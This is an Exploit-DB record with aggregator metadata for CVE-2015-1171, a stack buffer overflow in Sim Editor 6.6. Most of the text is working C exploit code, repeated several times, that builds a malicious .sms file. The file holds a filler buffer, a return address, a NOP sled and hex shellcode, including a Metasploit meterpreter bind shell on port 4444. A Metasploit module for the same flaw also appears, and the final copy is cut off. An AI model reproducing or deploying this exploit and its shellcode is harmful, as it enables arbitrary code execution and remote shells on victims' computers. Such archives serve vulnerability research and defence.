ID EDB-ID:35821
Type exploitdb
Reporter Osanda Malith
Modified 2015-01-16T00:00:00
Description
Sim Editor 6.6 - Stack Based Buffer Overflow. CVE-2015-1171. Local exploit for windows platform
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SIZE 65536
/*
* Title: Sim Editor v6.6 Stack Based Buffer Overflow
* Version: 6.6
* Tested on: Windows XP sp2 en, Windows 8 64-bit
* Date: 16-01-2015
* Author: Osanda Malith Jayathissa
* E-Mail: osanda[cat]unseen.is
* Website: OsandaMalith.wordpress.com
* CVE: CVE-2015-1171
*/
const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1"
"3231561503561583eefce2a496ab54"
"46672c07cf821d15abc70ca9b88abc"
"42ec3e36263830ff8d1e7f00209ed3"
"c222622e17855be16ac49c1c849475"
"6a3709f22e8428d424b45251fa41e9"
"582bf96612d3712082e25632feadd3"
"81752c32d8761e7ab749ae77c98e09"
"68bce46915c73f13c142ddb382f505"
"454663ce4923e7884db224a36a3fcb"
"63fb7be8a7a7d891fe0d8eaee0ea6f"
"0b6b187b2d36777abf4d3e7cbf4d11"
"158ec6fe620f0dbb9d450fea3500da"
"ae5bb331ec6530b38d9128b688deee"
"2be14f9b4b566f8e262bff50d1a58b"
"92";
/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
"4a83effc315f11035f11e2ca04054e"
"34f5d62fbd10e77dd9515ab2aa3457"
"39feacec4fd6c345e500ed56cb8ca1"
"954d70b8c9ad49731caf8e6eeffd47"
"e44212ecb85e99be2ce77e744cc6d0"
"0317c8d3c02341cc050f1b67fdfb9a"
"a1cc04ad8d823a0100db7ba6fbae77"
"d486a843a65c3d560016e5b2b0fb73"
"30beb0f01ea347d514dfccd8fa6996"
"fede324c9f479f23a098479b04d26a"
"c831b9e23d7342f3290431c1f6bedd"
"697e18198d55dcb570561c9fb6024c"
"b71f2b07479ffe87170f5167c8ef01"
"0f02e07e2f2d2a179e098670e2ad38"
"dd6b4b50cd3dc3cd2f1adc6a4f4970"
"22c7c69ef4e8d7b45644705f2d8645"
"7e3283ee17a5597e55575dab0f97cb"
"5786c06355ff272ca62a3ce532952b"
"0ad215ac5cb815c4389845f14635fa"
"aad2b5ab1f74dd5179b242a9ac42bf"
"7c89c0c90af908";
const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;
int menu() {
size_t shell_type = SHELLS_COUNT;
puts("\b[?] Choose an Option: ");
size_t i;
for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
scanf("%i", &shell_type);
return shell_type;
}
void banner() {
static const char banner[] =
" _____ _ _____ _ _ _ \n"
"| __|_|_____ | __|_| |_| |_ ___ ___ \n"
"|__ | | | | __| . | | _| . | _|\n"
"|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
"\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
"[~] Author: Osanda Malith Jayathissa\n"
"[~] E-Mail: osanda[cat]unseen.is\n"
"[~] Website: OsandaMalith.wordpress.com\n\n";
fwrite(banner, sizeof(char), sizeof(banner) , stdout);
}
void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
size_t pattern_len = strlen(pattern);
count *= pattern_len;
if (count > dst_size) count = dst_size;
if (pattern_len > dst_size) pattern_len = dst_size;
size_t i, pI;
for (i = 0, pI = 0; i < count ; i++, pI++) {
if (pI == pattern_len) pI = 0;
dst[i] = pattern[pI];
}
}
int main() {
banner();
int shell_type = menu();
if (shell_type >= SHELLS_COUNT) {
printf("[-] Enter a valid input\n");
exit (1);
}
char *buff = (char*) calloc (SIZE, sizeof(char));
char *nops = (char*) calloc (SIZE, sizeof(char));
if (!buff || !nops) exit (1);
patternfill(buff, "41", 405, SIZE);
patternfill(nops, "90", 16, SIZE);
char ret[] = "B3804200";
const char* filename = "exploit.sms";
FILE *outfile = fopen(filename, "w");
if (!outfile) {
printf("%s\n","Could not open file");
exit (1);
}
fputs(buff, outfile);
fputs(ret, outfile);
fputs(nops, outfile);
fputs(shells[shell_type], outfile);
printf("%s", shell_info[shell_type]);
fclose(outfile);
free(buff);
printf("[+] Successfully to written to: \"%s\"\n", filename);
return 0;
}
/*EOF*/
{"id": "EDB-ID:35821", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sim Editor 6.6 - Stack Based Buffer Overflow", "description": "Sim Editor 6.6 - Stack Based Buffer Overflow. CVE-2015-1171. Local exploit for windows platform", "published": "2015-01-16T00:00:00", "modified": "2015-01-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/35821/", "reporter": "Osanda Malith", "references": [], "cvelist": ["CVE-2015-1171"], "lastseen": "2016-02-04T02:05:35", "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-02-04T02:05:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1171"]}, {"type": "zdt", "idList": ["1337DAY-ID-23133"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/GSM_SIM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129992"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:274685E9B1AAB3DC857CCA19B27A95D9"]}], "modified": "2016-02-04T02:05:35", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://www.exploit-db.com/download/35821/", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#define SIZE 65536 \r\n\r\n/*\r\n * Title: Sim Editor v6.6 Stack Based Buffer Overflow\r\n * Version: 6.6\r\n * Tested on: Windows XP sp2 en, Windows 8 64-bit\r\n * Date: 16-01-2015\r\n * Author: Osanda Malith Jayathissa\r\n * E-Mail: osanda[cat]unseen.is\r\n * Website: OsandaMalith.wordpress.com\r\n * CVE: CVE-2015-1171\r\n */\r\n\r\nconst char shell1[] = \"ba516a43ddd9e9d97424f45e33c9b1\" \r\n \t\t\"3231561503561583eefce2a496ab54\" \r\n \t\t\"46672c07cf821d15abc70ca9b88abc\"\r\n \t\t\"42ec3e36263830ff8d1e7f00209ed3\"\r\n \t\t\"c222622e17855be16ac49c1c849475\"\r\n \t\t\"6a3709f22e8428d424b45251fa41e9\"\r\n \t\t\"582bf96612d3712082e25632feadd3\"\r\n \t\t\"81752c32d8761e7ab749ae77c98e09\"\r\n \t\t\"68bce46915c73f13c142ddb382f505\"\r\n \t\t\"454663ce4923e7884db224a36a3fcb\"\r\n \t\t\"63fb7be8a7a7d891fe0d8eaee0ea6f\"\r\n \t\t\"0b6b187b2d36777abf4d3e7cbf4d11\"\r\n \t\t\"158ec6fe620f0dbb9d450fea3500da\"\r\n \t\t\"ae5bb331ec6530b38d9128b688deee\"\r\n \t\t\"2be14f9b4b566f8e262bff50d1a58b\"\r\n \t\t\"92\"; \r\n\r\n/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */\r\nconst char shell2[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\"\r\n\t\t\"4a83effc315f11035f11e2ca04054e\"\r\n\t\t\"34f5d62fbd10e77dd9515ab2aa3457\"\r\n\t\t\"39feacec4fd6c345e500ed56cb8ca1\"\r\n\t\t\"954d70b8c9ad49731caf8e6eeffd47\"\r\n\t\t\"e44212ecb85e99be2ce77e744cc6d0\"\r\n\t\t\"0317c8d3c02341cc050f1b67fdfb9a\"\r\n\t\t\"a1cc04ad8d823a0100db7ba6fbae77\"\r\n\t\t\"d486a843a65c3d560016e5b2b0fb73\"\r\n\t\t\"30beb0f01ea347d514dfccd8fa6996\"\r\n\t\t\"fede324c9f479f23a098479b04d26a\"\r\n\t\t\"c831b9e23d7342f3290431c1f6bedd\"\r\n\t\t\"697e18198d55dcb570561c9fb6024c\"\r\n\t\t\"b71f2b07479ffe87170f5167c8ef01\"\r\n\t\t\"0f02e07e2f2d2a179e098670e2ad38\"\r\n\t\t\"dd6b4b50cd3dc3cd2f1adc6a4f4970\"\r\n\t\t\"22c7c69ef4e8d7b45644705f2d8645\"\r\n\t\t\"7e3283ee17a5597e55575dab0f97cb\"\r\n\t\t\"5786c06355ff272ca62a3ce532952b\"\r\n\t\t\"0ad215ac5cb815c4389845f14635fa\"\r\n\t\t\"aad2b5ab1f74dd5179b242a9ac42bf\"\r\n\t\t\"7c89c0c90af908\";\r\n\r\nconst char *shells[] = { shell1, shell2 };\r\nconst char *shell_names[] = { \"MS Paint\", \"Bind Shell\" };\r\nconst char *shell_info[] = { \"\", \"[*] Connect on port 4444\\n\" };\r\nconst size_t SHELLS_COUNT = 2;\r\n\r\nint menu() {\r\n size_t shell_type = SHELLS_COUNT;\r\n puts(\"\\b[?] Choose an Option: \");\r\n size_t i;\r\n for (i = 0; i < SHELLS_COUNT; i++) printf(\"%d. %s\\n\", i, shell_names[i]);\r\n scanf(\"%i\", &shell_type);\r\n\treturn shell_type;\r\n}\r\n\r\nvoid banner() {\r\n static const char banner[] = \r\n \" _____ _ _____ _ _ _ \\n\"\r\n \"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\"\r\n \"|__ | | | | __| . | | _| . | _|\\n\"\r\n \"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\"\r\n \"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\"\r\n \"[~] Author: Osanda Malith Jayathissa\\n\"\r\n \"[~] E-Mail: osanda[cat]unseen.is\\n\"\r\n \"[~] Website: OsandaMalith.wordpress.com\\n\\n\";\r\n\r\n fwrite(banner, sizeof(char), sizeof(banner) , stdout);\r\n}\r\n\r\nvoid patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {\r\n size_t pattern_len = strlen(pattern);\r\n count *= pattern_len;\r\n if (count > dst_size) count = dst_size;\r\n if (pattern_len > dst_size) pattern_len = dst_size;\r\n\r\n size_t i, pI;\r\n for (i = 0, pI = 0; i < count ; i++, pI++) {\r\n if (pI == pattern_len) pI = 0;\r\n dst[i] = pattern[pI];\r\n }\r\n}\r\n\r\nint main() {\r\n banner();\r\n int shell_type = menu();\r\n if (shell_type >= SHELLS_COUNT) {\r\n printf(\"[-] Enter a valid input\\n\");\r\n exit (1);\r\n }\r\n\r\n char *buff = (char*) calloc (SIZE, sizeof(char));\r\n char *nops = (char*) calloc (SIZE, sizeof(char));\r\n if (!buff || !nops) exit (1);\r\n\r\n patternfill(buff, \"41\", 405, SIZE);\r\n patternfill(nops, \"90\", 16, SIZE);\r\n\r\n char ret[] = \"B3804200\";\r\n const char* filename = \"exploit.sms\";\r\n\r\n FILE *outfile = fopen(filename, \"w\");\r\n if (!outfile) {\r\n printf(\"%s\\n\",\"Could not open file\");\r\n exit (1);\r\n }\r\n\r\n fputs(buff, outfile);\r\n fputs(ret, outfile);\r\n fputs(nops, outfile);\r\n\r\n fputs(shells[shell_type], outfile);\r\n printf(\"%s\", shell_info[shell_type]);\r\n fclose(outfile);\r\n free(buff);\r\n printf(\"[+] Successfully to written to: \\\"%s\\\"\\n\", filename); \r\n return 0;\r\n}\r\n/*EOF*/", "osvdbidlist": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:21", "description": "Stack-based buffer overflow in GSM SIM Utility (aka SIM Card Editor) 6.6 allows remote attackers to execute arbitrary code via a long entry in a .sms file.", "edition": 4, "cvss3": {}, "published": "2015-08-28T21:59:00", "title": "CVE-2015-1171", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1171"], "modified": "2015-08-31T17:45:00", "cpe": ["cpe:/a:gsm:sim_card_editor:6.6"], "id": "CVE-2015-1171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gsm:sim_card_editor:6.6:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-05T01:37:05", "edition": 2, "description": "Sim Editor version 6.6 stack-based buffer overflow exploit.", "published": "2015-01-17T00:00:00", "type": "zdt", "title": "Sim Editor 6.6 Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2015-01-17T00:00:00", "id": "1337DAY-ID-23133", "href": "https://0day.today/exploit/description/23133", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#define SIZE 65536 \r\n\r\n/*\r\n * Title: Sim Editor v6.6 Stack Based Buffer Overflow\r\n * Version: 6.6\r\n * Tested on: Windows XP sp2 en, Windows 8 64-bit\r\n * Date: 16-01-2015\r\n * Author: Osanda Malith Jayathissa\r\n * Website: OsandaMalith.wordpress.com\r\n */\r\n\r\n\r\nvoid add(int count, unsigned char* dest, unsigned char *src);\r\nint menu();\r\nvoid banner();\r\n\r\nint main()\r\n{\r\n banner();\r\n int i = menu();\r\n unsigned char *buff, *nops;\r\n FILE *outfile; \r\n \r\n buff = (unsigned char*) malloc (SIZE);\r\n nops = (unsigned char*) malloc (SIZE);\r\n if (!buff) exit (1);\r\n\r\n buff[0] = nops[0] = 0; \r\n add(405, buff, \"41\");\r\n add(16, nops, \"90\");\r\n\r\n unsigned char ret[] = \"D3804200\"; /* 0x4280D3 call esp */\r\n \r\n outfile = fopen(\"exploit.sms\", \"w\");\r\n\r\n if (!outfile) printf(\"%s\\n\",\"Could not open file\"); \r\n \r\n fputs(buff, outfile);\r\n fputs(ret, outfile);\r\n fputs(nops, outfile);\r\n \r\n if(i == 1) {\r\n unsigned char shell[] = \"ba516a43ddd9e9d97424f45e33c9b1\"\r\n \"3231561503561583eefce2a496ab54\"\r\n \"46672c07cf821d15abc70ca9b88abc\"\r\n \"42ec3e36263830ff8d1e7f00209ed3\"\r\n \"c222622e17855be16ac49c1c849475\"\r\n \"6a3709f22e8428d424b45251fa41e9\"\r\n \"582bf96612d3712082e25632feadd3\"\r\n \"81752c32d8761e7ab749ae77c98e09\"\r\n \"68bce46915c73f13c142ddb382f505\"\r\n \"454663ce4923e7884db224a36a3fcb\"\r\n \"63fb7be8a7a7d891fe0d8eaee0ea6f\"\r\n \"0b6b187b2d36777abf4d3e7cbf4d11\"\r\n \"158ec6fe620f0dbb9d450fea3500da\"\r\n \"ae5bb331ec6530b38d9128b688deee\"\r\n \"2be14f9b4b566f8e262bff50d1a58b\"\r\n \"92\"; fputs(shell, outfile);}\r\n\r\n else if(i == 2) {\r\n /* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */\r\n unsigned char shell[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\"\r\n \"4a83effc315f11035f11e2ca04054e\"\r\n \"34f5d62fbd10e77dd9515ab2aa3457\"\r\n \"39feacec4fd6c345e500ed56cb8ca1\"\r\n \"954d70b8c9ad49731caf8e6eeffd47\"\r\n \"e44212ecb85e99be2ce77e744cc6d0\"\r\n \"0317c8d3c02341cc050f1b67fdfb9a\"\r\n \"a1cc04ad8d823a0100db7ba6fbae77\"\r\n \"d486a843a65c3d560016e5b2b0fb73\"\r\n \"30beb0f01ea347d514dfccd8fa6996\"\r\n \"fede324c9f479f23a098479b04d26a\"\r\n \"c831b9e23d7342f3290431c1f6bedd\"\r\n \"697e18198d55dcb570561c9fb6024c\"\r\n \"b71f2b07479ffe87170f5167c8ef01\"\r\n \"0f02e07e2f2d2a179e098670e2ad38\"\r\n \"dd6b4b50cd3dc3cd2f1adc6a4f4970\"\r\n \"22c7c69ef4e8d7b45644705f2d8645\"\r\n \"7e3283ee17a5597e55575dab0f97cb\"\r\n \"5786c06355ff272ca62a3ce532952b\"\r\n \"0ad215ac5cb815c4389845f14635fa\"\r\n \"aad2b5ab1f74dd5179b242a9ac42bf\"\r\n \"7c89c0c90af908\";\r\n fputs(shell, outfile); \r\n puts(\"[*] Connect on port 4444\");}\r\n else { puts(\"[-] Enter a valid input\"); exit(-1); } \r\n\r\n fclose(outfile);\r\n free(buff);\r\n printf(\"%s\",\"[+] Successfully to written to \\\"exploit.sms\\\"\"); \r\n \r\n return 0;\r\n}\r\n\r\nvoid add(int count, unsigned char* dest, unsigned char *src) {\r\n int i;\r\n for (i=0; i<count; i++) strcat(dest, src); \r\n}\r\n\r\nint menu() {\r\n int i;\r\n puts(\"\\b[?] Choose an Option: \");\r\n puts(\"1. MS Paint\");\r\n puts(\"2. Bind Shell\");\r\n scanf(\"%i\", &i);\r\n return i;\r\n}\r\n\r\nvoid \r\nbanner() {\r\n static const char banner[] = \r\n \" _____ _ _____ _ _ _ \\n\"\r\n \"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\"\r\n \"|__ | | | | __| . | | _| . | _|\\n\"\r\n \"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\"\r\n \"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\"\r\n \"[~] Author: Osanda Malith Jayathissa\\n\"\r\n \"[~] Website: OsandaMalith.wordpress.com\\n\\n\"; \r\n \r\n fwrite(banner, sizeof(char), sizeof(banner) , stdout);\r\n}\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23133"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:51", "description": "", "published": "2015-01-16T00:00:00", "type": "packetstorm", "title": "Sim Editor 6.6 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2015-01-16T00:00:00", "id": "PACKETSTORM:129992", "href": "https://packetstormsecurity.com/files/129992/Sim-Editor-6.6-Buffer-Overflow.html", "sourceData": "`#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n \n#define SIZE 65536 \n \n/* \n* Title: Sim Editor v6.6 Stack Based Buffer Overflow \n* Version: 6.6 \n* Tested on: Windows XP sp2 en, Windows 8 64-bit \n* Date: 16-01-2015 \n* Author: Osanda Malith Jayathissa \n* E-Mail: osanda[cat]unseen.is \n* Website: OsandaMalith.wordpress.com \n*/ \n \n \nvoid add(int count, unsigned char* dest, unsigned char *src); \nint menu(); \nvoid banner(); \n \nint main() \n{ \nbanner(); \nint i = menu(); \nunsigned char *buff, *nops; \nFILE *outfile; \n \nbuff = (unsigned char*) malloc (SIZE); \nnops = (unsigned char*) malloc (SIZE); \nif (!buff) exit (1); \n \nbuff[0] = nops[0] = 0; \nadd(405, buff, \"41\"); \nadd(16, nops, \"90\"); \n \nunsigned char ret[] = \"D3804200\"; /* 0x4280D3 call esp */ \n \noutfile = fopen(\"exploit.sms\", \"w\"); \n \nif (!outfile) printf(\"%s\\n\",\"Could not open file\"); \n \nfputs(buff, outfile); \nfputs(ret, outfile); \nfputs(nops, outfile); \n \nif(i == 1) { \nunsigned char shell[] = \"ba516a43ddd9e9d97424f45e33c9b1\" \n\"3231561503561583eefce2a496ab54\" \n\"46672c07cf821d15abc70ca9b88abc\" \n\"42ec3e36263830ff8d1e7f00209ed3\" \n\"c222622e17855be16ac49c1c849475\" \n\"6a3709f22e8428d424b45251fa41e9\" \n\"582bf96612d3712082e25632feadd3\" \n\"81752c32d8761e7ab749ae77c98e09\" \n\"68bce46915c73f13c142ddb382f505\" \n\"454663ce4923e7884db224a36a3fcb\" \n\"63fb7be8a7a7d891fe0d8eaee0ea6f\" \n\"0b6b187b2d36777abf4d3e7cbf4d11\" \n\"158ec6fe620f0dbb9d450fea3500da\" \n\"ae5bb331ec6530b38d9128b688deee\" \n\"2be14f9b4b566f8e262bff50d1a58b\" \n\"92\"; fputs(shell, outfile);} \n \nelse if(i == 2) { \n/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */ \nunsigned char shell[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\" \n\"4a83effc315f11035f11e2ca04054e\" \n\"34f5d62fbd10e77dd9515ab2aa3457\" \n\"39feacec4fd6c345e500ed56cb8ca1\" \n\"954d70b8c9ad49731caf8e6eeffd47\" \n\"e44212ecb85e99be2ce77e744cc6d0\" \n\"0317c8d3c02341cc050f1b67fdfb9a\" \n\"a1cc04ad8d823a0100db7ba6fbae77\" \n\"d486a843a65c3d560016e5b2b0fb73\" \n\"30beb0f01ea347d514dfccd8fa6996\" \n\"fede324c9f479f23a098479b04d26a\" \n\"c831b9e23d7342f3290431c1f6bedd\" \n\"697e18198d55dcb570561c9fb6024c\" \n\"b71f2b07479ffe87170f5167c8ef01\" \n\"0f02e07e2f2d2a179e098670e2ad38\" \n\"dd6b4b50cd3dc3cd2f1adc6a4f4970\" \n\"22c7c69ef4e8d7b45644705f2d8645\" \n\"7e3283ee17a5597e55575dab0f97cb\" \n\"5786c06355ff272ca62a3ce532952b\" \n\"0ad215ac5cb815c4389845f14635fa\" \n\"aad2b5ab1f74dd5179b242a9ac42bf\" \n\"7c89c0c90af908\"; \nfputs(shell, outfile); \nputs(\"[*] Connect on port 4444\");} \nelse { puts(\"[-] Enter a valid input\"); exit(-1); } \n \nfclose(outfile); \nfree(buff); \nprintf(\"%s\",\"[+] Successfully to written to \\\"exploit.sms\\\"\"); \n \nreturn 0; \n} \n \nvoid add(int count, unsigned char* dest, unsigned char *src) { \nint i; \nfor (i=0; i<count; i++) strcat(dest, src); \n} \n \nint menu() { \nint i; \nputs(\"\\b[?] Choose an Option: \"); \nputs(\"1. MS Paint\"); \nputs(\"2. Bind Shell\"); \nscanf(\"%i\", &i); \nreturn i; \n} \n \nvoid \nbanner() { \nstatic const char banner[] = \n\" _____ _ _____ _ _ _ \\n\" \n\"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\" \n\"|__ | | | | __| . | | _| . | _|\\n\" \n\"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\" \n\"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\" \n\"[~] Author: Osanda Malith Jayathissa\\n\" \n\"[~] E-Mail: osanda[cat]unseen.is\\n\" \n\"[~] Website: OsandaMalith.wordpress.com\\n\\n\"; \n \nfwrite(banner, sizeof(char), sizeof(banner) , stdout); \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129992/simeditor-overflow.txt"}], "metasploit": [{"lastseen": "2020-08-27T01:32:05", "description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15. When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer overflow occurs which allows an attacker to execute arbitrary code.\n", "published": "2012-04-14T05:12:48", "type": "metasploit", "title": "GSM SIM Editor 5.15 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2018-07-12T22:34:52", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/GSM_SIM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ruben Alejandro',\n 'chap0 <contact.chap0[at]gmail.com>',\n 'Lincoln <lincoln[at]corelan.be>'\n ],\n 'References' =>\n [\n [ 'CVE', '2015-1171' ],\n [ 'OSVDB', '81161' ],\n [ 'EDB', '14258' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment #add esp, -3500\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3',\n {\n 'Ret' => 0x00405201, # call esp - SIMEditor.exe\n 'Offset' => 810\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 07 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),\n ])\n\n end\n\n def exploit\n buffer = rand_text_numeric(target['Offset'])\n buffer << [target.ret].pack('V').unpack(\"H*\")[0]\n buffer << make_nops(30).unpack(\"H*\")[0]\n buffer << payload.encoded.unpack(\"H*\")[0]\n\n file_create(buffer)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/gsm_sim.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nSim Editor 6.6 - Local Stack Buffer Overflow", "edition": 1, "published": "2015-01-16T00:00:00", "title": "Sim Editor 6.6 - Local Stack Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1171"], "modified": "2015-01-16T00:00:00", "id": "EXPLOITPACK:274685E9B1AAB3DC857CCA19B27A95D9", "href": "", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define SIZE 65536 \n\n/*\n * Title: Sim Editor v6.6 Stack Based Buffer Overflow\n * Version: 6.6\n * Tested on: Windows XP sp2 en, Windows 8 64-bit\n * Date: 16-01-2015\n * Author: Osanda Malith Jayathissa\n * E-Mail: osanda[cat]unseen.is\n * Website: OsandaMalith.wordpress.com\n * CVE: CVE-2015-1171\n */\n\nconst char shell1[] = \"ba516a43ddd9e9d97424f45e33c9b1\" \n \t\t\"3231561503561583eefce2a496ab54\" \n \t\t\"46672c07cf821d15abc70ca9b88abc\"\n \t\t\"42ec3e36263830ff8d1e7f00209ed3\"\n \t\t\"c222622e17855be16ac49c1c849475\"\n \t\t\"6a3709f22e8428d424b45251fa41e9\"\n \t\t\"582bf96612d3712082e25632feadd3\"\n \t\t\"81752c32d8761e7ab749ae77c98e09\"\n \t\t\"68bce46915c73f13c142ddb382f505\"\n \t\t\"454663ce4923e7884db224a36a3fcb\"\n \t\t\"63fb7be8a7a7d891fe0d8eaee0ea6f\"\n \t\t\"0b6b187b2d36777abf4d3e7cbf4d11\"\n \t\t\"158ec6fe620f0dbb9d450fea3500da\"\n \t\t\"ae5bb331ec6530b38d9128b688deee\"\n \t\t\"2be14f9b4b566f8e262bff50d1a58b\"\n \t\t\"92\"; \n\n/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */\nconst char shell2[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\"\n\t\t\"4a83effc315f11035f11e2ca04054e\"\n\t\t\"34f5d62fbd10e77dd9515ab2aa3457\"\n\t\t\"39feacec4fd6c345e500ed56cb8ca1\"\n\t\t\"954d70b8c9ad49731caf8e6eeffd47\"\n\t\t\"e44212ecb85e99be2ce77e744cc6d0\"\n\t\t\"0317c8d3c02341cc050f1b67fdfb9a\"\n\t\t\"a1cc04ad8d823a0100db7ba6fbae77\"\n\t\t\"d486a843a65c3d560016e5b2b0fb73\"\n\t\t\"30beb0f01ea347d514dfccd8fa6996\"\n\t\t\"fede324c9f479f23a098479b04d26a\"\n\t\t\"c831b9e23d7342f3290431c1f6bedd\"\n\t\t\"697e18198d55dcb570561c9fb6024c\"\n\t\t\"b71f2b07479ffe87170f5167c8ef01\"\n\t\t\"0f02e07e2f2d2a179e098670e2ad38\"\n\t\t\"dd6b4b50cd3dc3cd2f1adc6a4f4970\"\n\t\t\"22c7c69ef4e8d7b45644705f2d8645\"\n\t\t\"7e3283ee17a5597e55575dab0f97cb\"\n\t\t\"5786c06355ff272ca62a3ce532952b\"\n\t\t\"0ad215ac5cb815c4389845f14635fa\"\n\t\t\"aad2b5ab1f74dd5179b242a9ac42bf\"\n\t\t\"7c89c0c90af908\";\n\nconst char *shells[] = { shell1, shell2 };\nconst char *shell_names[] = { \"MS Paint\", \"Bind Shell\" };\nconst char *shell_info[] = { \"\", \"[*] Connect on port 4444\\n\" };\nconst size_t SHELLS_COUNT = 2;\n\nint menu() {\n size_t shell_type = SHELLS_COUNT;\n puts(\"\\b[?] Choose an Option: \");\n size_t i;\n for (i = 0; i < SHELLS_COUNT; i++) printf(\"%d. %s\\n\", i, shell_names[i]);\n scanf(\"%i\", &shell_type);\n\treturn shell_type;\n}\n\nvoid banner() {\n static const char banner[] = \n \" _____ _ _____ _ _ _ \\n\"\n \"| __|_|_____ | __|_| |_| |_ 